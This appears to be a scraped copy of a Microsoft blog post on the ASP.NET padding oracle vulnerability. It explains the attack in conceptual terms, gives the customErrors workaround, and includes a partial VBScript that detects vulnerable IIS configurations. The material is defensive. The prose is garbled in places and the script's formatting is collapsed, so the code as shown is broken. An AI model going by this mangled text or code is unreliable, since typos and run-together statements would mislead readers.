Understanding the ASP. NET Vulnerability

Our recentAdvisoryDescribes an ASP. NET vulnerability which was recently publicly disclosed. this blog post will give you more information about the vulnerability and the workaround. it will also provide a script which will help you detect ASP. NET applications on your server that are in a vulnerable configuration.

The Impact of the Vulnerability

ASP. net uses encryption to hide sensitive data and protect it from tampering by the client. however, a vulnerability in the ASP. net encryption implementation can allow an attacker to decrypt and tamper with this data.

But what can the attacker do with this capability? Part of the answer depends on the ASP. net application being attacked. for example, if the ASP. net application stores sensitive information, such as passwords or database connection strings, in the ViewState object this data cocould be compromised. the ViewState object is encrypted and sent to the client in a hidden form variable, so it is a possible target of this attack.

If the ASP. net application is using ASP. net 3.5 SP1 or above, the attacker cocould use this encryption vulnerability to request the contents of an arbitrary file within the ASP. net application. the public disclosure demonstrated using this technique to retrieve the contents of web. config. any file in the ASP. net application which the worker process has access to will be returned to the attacker.

How the Vulnerability Works

To understand how this vulnerability works, you need to know about cryptographic into Les. an oracle in the context of cryptography is a system which provides hints as you ask it questions. in this case, there is a vulnerability in ASP. net which acts as a padding oracle. this allows an attacker to send chosen cipher text to the server and learn if it was decrypted properly by examining which error code was returned by the server.

By making into requests the attacker can learn enough to successfully decrypt the rest of the cipher text. The attacker can then alter the plain text and re-encrypt it as well.

The Workaround-Silencing the Oracle

The workaround for this vulnerability is to use the customErrors feature of ASP. NET to configure applications to return the same error page regardless of the error encountered on the server.

By following the steps inAdvisoryTo map all error messages to a single error page, you make it difficult for the attacker to distinguish between the different types of errors, please tively limiting access to the oracle.

How to Detect Vulnerable ASP. Net Applications

Some ASP. net applications may already be configured to return the same error page for all server errors. to detect ASP. net applications that are not configured this way and need to have the workaround applied to them, use the following script:

  DetectCustomErrorsDisabled.vbs Script  Version 3.1    This script will help detect vulnerable configuration for the Padding Oracle   ASP.Net vulnerability documented in MS advisory 2416728.    http://www.microsoft.com/technet/security/advisory/2416728.mspx    Usage:       cscript DetectCustomErrorsDisabled.vbs [RemoteServerName]   NOTE: THIS SCRIPT USES THE FILESYSTEM AND SHELL OBJECT AND SHOULD BE       RUN AS AN ADMINISTRATOR  The script works by enumerating all web.config and assessing if the   side-channel leak for the padding oracle vulnerability is mitigated by the   use of homogenizing custom error responses from ASP.Net applications.     Note: On IIS 7 servers, this script requires IIS6 compatibility mode to be  installed.    More information on: http://blogs.technet.com/b/srd/archive/2010/09/17

/understanding-the-asp-net-vulnerability.aspx    Version History:  1.0 - Initial version  2.0 - Added additional checks for app/site root config  3.0 - Added error validation for XML parsing and path checks  3.1 - Added check for missing root web.config OPTION EXPLICITON ERROR RESUME NEXTDIM strServerDIM objWebService, objWebServer, objDir, objFileSysDIM physicalPath, dir, xmlDoc, nodeList, node, retDIM configFile, configFilePath, configLineDIM childNodes, ErrPage500, ErrPage404, errFoundDIM index, errCountstrServer = "localhost" Parse command line inputIF WScript.Arguments.Length=1 THEN    strServer = WScript.Arguments( 0 )END IFIF WScript.Arguments.Length>1 THEN    WScript.Echo "Illegal number of arguments"    WScript.Echo "Usage: cscript.exe DetectCustomErrorsDisabled.vbs 

[RemoteServerName]"    WScript.Quit( 1 )END IF InitializationsSET objFileSys = CreateObject("Scripting.FileSystemObject")SET objWebService = GetObject( "IIS://" & strServer & "/W3SVC" )IF Err <> 0 THEN    WScript.Echo "Could not find IIS ADSI object. 

Make sure you have IIS and IIS6 management compatibility installed."    WScript.Quit (1)END IFSET xmlDoc = CreateObject("Microsoft.XMLDOM")IF IsNull(objFileSys) THEN    WScript.Echo "Failed to create FileSystemObject. Please run script as Admin."    WScript.Quit (1)END IFIF IsNull(objWebService) THEN    WScript.Echo "Failed to connect to IIS ADSI provider. Make sure you have IIS6 "_    + "management compatibility role service installed."    WScript.Quit (1)END IFWScript.Echo("Enumerating possible paths with ASP.Net configuration that have" _    +" custom errors turned off.")    WScript.Echo ("")     Search web server for unsafe configurationFindASPNetConfig(objWebService) Search all paths on web server for possible web.config  files.SUB FindASPNetConfig(WebService)    FOR EACH objWebServer IN WebService        IF objWebserver.Class = "IIsWebServer" THEN            EnumDirectories(objWebServer)        END IF    NEXT    END SUB Recursively go through vdirs and webdirsSUB EnumDirectories(objDir)        DIM objSubDir     The first call to this is from IIsWebServer, so we can skip that    FOR EACH objSubDir IN objDir        IF (objSubDir.Class = "IIsWebVirtualDir") THEN            GetPhysicalPaths(objSubDir)                        EnumDirectories(objSubDir)                  END IF    NEXT    END SUB Get physical paths for web and virtual directoriesSUB GetPhysicalPaths(objDir)        physicalPath = objDir.Path    CALL EnumWebConfig(physicalPath,1)END SUB Recursively search for web.config files.SUB EnumWebConfig(Path,IsRoot)    IF NOT objFileSys.FolderExists(Path) THEN         IF IsRoot THEN             WScript.Echo Path & ": Sites disk path is incorrect 

and root web.config does not exist"            WScript.Echo Path & ": ** Vulnerable configuration f